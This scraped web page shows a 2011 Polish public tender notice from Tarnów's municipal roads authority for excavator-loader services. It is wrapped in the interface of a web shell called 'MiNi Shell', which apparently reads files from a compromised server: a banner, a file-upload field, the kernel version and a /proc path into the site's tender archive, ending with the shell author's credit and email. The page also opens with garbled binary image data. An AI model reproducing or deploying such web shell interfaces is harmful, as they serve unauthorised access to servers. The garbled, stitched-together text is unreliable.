JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20110218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20110218/57651-N-2011.html

<p class="kh_header"><b>Tarnów: Usługi wykonywane koparko -ładowarkami  przy obsłudze robót drogowych prowadzonych przez Zamawiającego  na  ulicach   miasta Tarnowa.</b><br>
<b>Numer ogłoszenia: 57651 - 2011; data zamieszczenia: 18.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Tarnowski Zarząd Dróg Miejskich w Tarnowie , ul. Bernardyńska 24, 33-100 Tarnów, woj. małopolskie, tel. (014) 6214303, 6219105, faks (014) 6219105.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tzdm.tarnow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi wykonywane koparko -ładowarkami  przy obsłudze robót drogowych prowadzonych przez Zamawiającego  na  ulicach   miasta Tarnowa..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są: usługi wykonywane koparko -ładowarkami  przy obsłudze robót   drogowych prowadzonych przez Zamawiającego  na  ulicach   miasta Tarnowa.
2.Zamawiający wymaga, aby usługi  wykonywane były koparko- ładowarkami  o napędzie 4x4           
3.Przewidywany czas  pracy koparko- ładowarek w czasie realizacji zamówienia : od 5 do 10 godzin dziennie wliczając  do tego  godziny postoju.
Przewidywana ilość godzin pracy: maksymalnie 3.500. Zamawiający zastrzega sobie możliwość  zlecenia w okresie obowiązywania umowy mniejszej ilości godzin niż przewidywana. Wykonawcy nie przysługują z tego tytułu żadne roszczenia w stosunku do Zamawiającego.W  I-szym i IV-tym kw. 2011 r.  usługi  koparkami mogą być wykorzystane w   30-50 % dziennego czasu realizacji.
W II-gim i III-cim kw. 2011 r. -  w czasie nasilenia robót drogowych  usługi koparkami  mogą być wykorzystane w 100 % dziennego czasu realizacji.
4.W przetargu  zostanie wybranych ogółem 2  koparko-ładowarki  z pełnym osprzętem o  napędzie  4x4.
5.Usługi będą wykonywane każdorazowo na zlecenie Zamawiającego przekazane Wykonawcy   w formie telefonicznej, faksem lub pisemnie, w których zostanie opisany rodzaj i ilość robót.
6.Rozpoczęcie realizacji każdorazowo zleconej usługi ma nastąpić w terminie  1 dnia  od daty przekazania przez Zamawiającego zlecenia. 
7.Sposób rozliczenia : forma bezgotówkowa, rozliczenie za wykonane zamówienie  realizowane będzie na podstawie faktur VAT wystawianych na koniec każdego miesiąca przez Wykonawcę  wraz z kartami pracy zatwierdzonymi przez mistrza robót drogowych  lub Kierownika Działu Wykonawstwa  Zamawiającego. Termin płatności  przelewem na konto Wykonawcy do 21 dni  od daty dostarczenia   faktury  do siedziby Zamawiającego. Wykonawca zobowiązany jest dostarczyć fakturę Zamawiającemu w ciągu 7 dni od daty wystawienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.18.20.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca obowiązany jest do wniesienia wadium w  wysokości 1.000 zł (słownie:  jeden tysiąc  złotych) niezależnie na jaką część i wielkość zamówienia będzie składana oferta, w terminie wyznaczonym do składania ofert. Wadium może być wniesione  w formach określonych w art. 45 ust. 6 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga wykazania, że Wykonawca dysponuje koparko-ładowarkami                z pełnym osprzętem  koparko-ładowarka o napędzie  4x4
Jeżeli Wykonawca (niezależnie od charakteru prawnego łączących stosunków z innymi podmiotami) polega na zasobach innych podmiotów - potencjale technicznym, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami. Przedstawia w tym celu pisemne zobowiązanie tego/tych podmiotu/ów do oddania do dyspozycji potencjału technicznego  jak wskazano wyżej, na okres korzystania z tego potencjału technicznego przy wykonywaniu zamówienia.  

Ocena spełnienia warunku odbędzie się na podstawie analizy treści oświadczenia  i dokumentu -   pkt. III. 4.1</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy zrealizowali należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert (liczy się data zakończenia dostawy), a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie min. 1 usługę koparko-ładowarkami  wykonywaną na terenie miasta ( ze względu na istniejące uzbrojenie podziemne w pasach drogowych i związane z tym doświadczenie operatora koparki przy wykonywaniu wykopów w takim terenie )  o łącznej  wartości zamówienia nie mniejszej niż 30.000 zł brutto w przypadku składania oferty na całość zamówienia oraz nie mniejszej niż 15.000 zł brutto w przypadku składania oferty tylko na jedną koparko-ładowarkę.
Zamawiający wymaga załączenia dokumentu potwierdzającego, że usługa została wykonana należycie - np. referencje, opinie zamawiających, na rzecz których zamówienia zostały zrealizowane.
            W  przypadku, gdy Wykonawca  polega na wiedzy i doświadczeniu - zasobach innych podmiotów  (niezależnie od charakteru prawnego łączących go z nimi stosunków) podmiot ten musi uczestniczyć  w wykonywaniu zamówienia, ponadto z dokumentów musi wynikać, że te podmioty wykonały usługę należycie. 
W przypadku świadczeń okresowych lub ciągłych (będących w trakcie realizacji)    dokumenty muszą potwierdzać, że usługa jak wyżej wykonywana jest należycie przez Wykonawcę lub inne podmioty, przy czy wymaga się, aby w ramach realizowanego zamówienia wykonana została co najmniej usługi o wartości zamówienia nie mniejszej niż 30.000 zł .
Ocena spełnienia warunku odbędzie się na podstawie analizy treści oświadczenia  i dokumentu - pktIII.4.1</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga wykazania, że Wykonawca dysponuje koparko-ładowarkami                z pełnym osprzętem  koparko-ładowarka o napędzie  4x4
Jeżeli Wykonawca (niezależnie od charakteru prawnego łączących stosunków z innymi podmiotami) polega na zasobach innych podmiotów - potencjale technicznym, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami. Przedstawia w tym celu pisemne zobowiązanie tego/tych podmiotu/ów do oddania do dyspozycji potencjału technicznego  jak wskazano wyżej, na okres korzystania z tego potencjału technicznego przy wykonywaniu zamówienia.  
Ocena spełnienia warunku odbędzie się na podstawie analizy treści oświadczenia  i dokumentu -   pkt. III. 4.1</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku
Ocena spełnienia warunku odbędzie się na podstawie analizy treści oświadcz i dokumentu - pkt. III.4.1</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej  50.000 zł. 
Ocena spełnienia warunku odbędzie się na podstawie analizy treści  oświadczeni i dokumentu - III pkt.4.1.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Jeżeli Wykonawca (niezależnie od charakteru prawnego łączących stosunków z innymi podmiotami) polega na zasobach innych podmiotów - potencjale technicznym, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami. Przedstawia w tym celu pisemne zobowiązanie tego/tych podmiotu/ów do oddania do dyspozycji potencjału technicznego  jak wskazano wyżej, na okres korzystania z tego potencjału technicznego przy wykonywaniu zamówienia. 
2. W przypadku, gdy Wykonawca w przetargu (niezależnie od charakteru prawnego    łączących stosunków z innymi podmiotami) polega na zasobach innych podmiotów - wiedzy i doświadczeniu, zobowiązany jest przedstawić pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji wiedzy i doświadczenia na okres korzystania przy wykonywaniu zamówienia.  
 3. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3.1) zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania (wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).
3. W celu wykazania, że wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 2 ustawy przedkłada oświadczenie określone w pkt. III.4.1. oraz dowód wniesienia wadium.
4. W przypadku, gdy uprawnienie do podpisania oferty, oświadczeń i dokumentów nie wynika z przedłożonych w ofercie dokumentów (pkt III.4.2), do oferty należy załączyć stosowne pełnomocnictwo podpisane przez osobę(y) uprawnioną(e) do zaciągania zobowiązań cywilno-prawnych w imieniu Wykonawcy. Pełnomocnictwa złożone do przetargu mają być podpisane przez osobę upoważnioną do zaciągania zobowiązań cywilno-prawnych w imieniu wykonawcy. Pełnomocnictwo należy przedstawić w formie oryginału lub kopii poświadczonej notarialnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>I .sposobu i zakresu wykonania usług w przypadkach:
a) wzrostu cen jednostkowych wykonywanej usługi w stosunku do cen jednostkowych  przedstawionych w ofercie Wykonawcy, powodujący wyczerpanie maksymalnej wartości usługi, o której  mowa w § 3 ust. 2 umowy przed końcowym terminem realizacji usług wskazanym w § 6.
c) zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie części przedmiotu umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy.
 II. innych postanowień umowy w przypadkach:
a) zmiany stawek podatku od towarów i usług,
b) zmiany nazwy zadania,
c) zmiany sprzętu
d) zmiany sposobu rozliczania wynagrodzenia Wykonawcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tzdm.tarnow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Tarnowski Zarząd Dróg Miejskich 33-100 Tarnów ul. Bernardyńska 24.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.03.2011 godzina 10:00, miejsce: Tarnowski Zarząd Dróg Miejskich 33-100 Tarnów ul. Bernardyńska 24.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Koparko-ładowarka o napędzie 4x4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są: usługi wykonywane koparko -ładowarkami  przy obsłudze robót   drogowych prowadzonych przez Zamawiającego  na  ulicach   miasta Tarnowa.
2.	Zamawiający wymaga, aby usługi  wykonywane były koparko- ładowarkami  o napędzie 4x4           
3.	Przewidywany czas  pracy koparko- ładowarek w czasie realizacji zamówienia : od 5 do 10 godzin dziennie wliczając  do tego  godziny postoju.
	Przewidywana ilość godzin pracy: maksymalnie 3.500. Zamawiający zastrzega sobie możliwość  zlecenia w okresie obowiązywania umowy mniejszej ilości godzin niż przewidywana. Wykonawcy nie przysługują z tego tytułu żadne roszczenia w stosunku do Zamawiającego.
      W  I-szym i IV-tym kw. 2011 r.  usługi  koparkami mogą być wykorzystane w   30-50 % dziennego czasu realizacji.
      W II-gim i III-cim kw. 2011 r. -  w czasie nasilenia robót drogowych  usługi koparkami  mogą być wykorzystane w 100 % dziennego czasu realizacji.
4.	W przetargu  zostanie wybranych ogółem 2  koparko-ładowarki  z pełnym osprzętem                              o  napędzie  4x4.
5.	Usługi będą wykonywane każdorazowo na zlecenie Zamawiającego przekazane Wykonawcy        w formie telefonicznej, faksem lub pisemnie, w których zostanie opisany rodzaj i ilość robót.
6.	Rozpoczęcie realizacji każdorazowo zleconej usługi ma nastąpić w terminie  1 dnia  od daty przekazania przez Zamawiającego zlecenia. 
7.	Sposób rozliczenia : forma bezgotówkowa, rozliczenie za wykonane zamówienie  realizowane będzie na podstawie faktur VAT wystawianych na koniec każdego miesiąca przez Wykonawcę  wraz z kartami pracy zatwierdzonymi przez mistrza robót drogowych  lub Kierownika Działu Wykonawstwa  Zamawiającego. Termin płatności  przelewem na konto Wykonawcy do 21 dni  od daty dostarczenia   faktury  do siedziby Zamawiającego. Wykonawca zobowiązany jest dostarczyć fakturę Zamawiającemu w ciągu 7 dni od daty wystawienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.18.20.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Koparko-ładowarka o napędzie 4x4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są: usługi wykonywane koparko -ładowarkami  przy obsłudze robót   drogowych prowadzonych przez Zamawiającego  na  ulicach   miasta Tarnowa.
2.Zamawiający wymaga, aby usługi  wykonywane były koparko- ładowarkami  o napędzie 4x4           
3.Przewidywany czas  pracy koparko- ładowarek w czasie realizacji zamówienia : od 5 do 10 godzin dziennie wliczając  do tego  godziny postoju.
Przewidywana ilość godzin pracy: maksymalnie 3.500. Zamawiający zastrzega sobie możliwość  zlecenia w okresie obowiązywania umowy mniejszej ilości godzin niż przewidywana. Wykonawcy nie przysługują z tego tytułu żadne roszczenia w stosunku do Zamawiającego.
 W  I-szym i IV-tym kw. 2011 r.  usługi  koparkami mogą być wykorzystane w   30-50 % dziennego czasu realizacji.
W II-gim i III-cim kw. 2011 r. -  w czasie nasilenia robót drogowych  usługi koparkami  mogą być wykorzystane w 100 % dziennego czasu realizacji.
4.W przetargu  zostanie wybranych ogółem 2  koparko-ładowarki  z pełnym osprzętem o  napędzie  4x4.
5.Usługi będą wykonywane każdorazowo na zlecenie Zamawiającego przekazane Wykonawcy        w formie telefonicznej, faksem lub pisemnie, w których zostanie opisany rodzaj i ilość robót.
6.Rozpoczęcie realizacji każdorazowo zleconej usługi ma nastąpić w terminie  1 dnia  od daty przekazania przez Zamawiającego zlecenia. 
7.Sposób rozliczenia : forma bezgotówkowa, rozliczenie za wykonane zamówienie  realizowane będzie na podstawie faktur VAT wystawianych na koniec każdego miesiąca przez Wykonawcę  wraz z kartami pracy zatwierdzonymi przez mistrza robót drogowych  lub Kierownika Działu Wykonawstwa  Zamawiającego. Termin płatności  przelewem na konto Wykonawcy do 21 dni  od daty dostarczenia   faktury  do siedziby Zamawiającego. Wykonawca zobowiązany jest dostarczyć fakturę Zamawiającemu w ciągu 7 dni od daty wystawienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.18.20.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com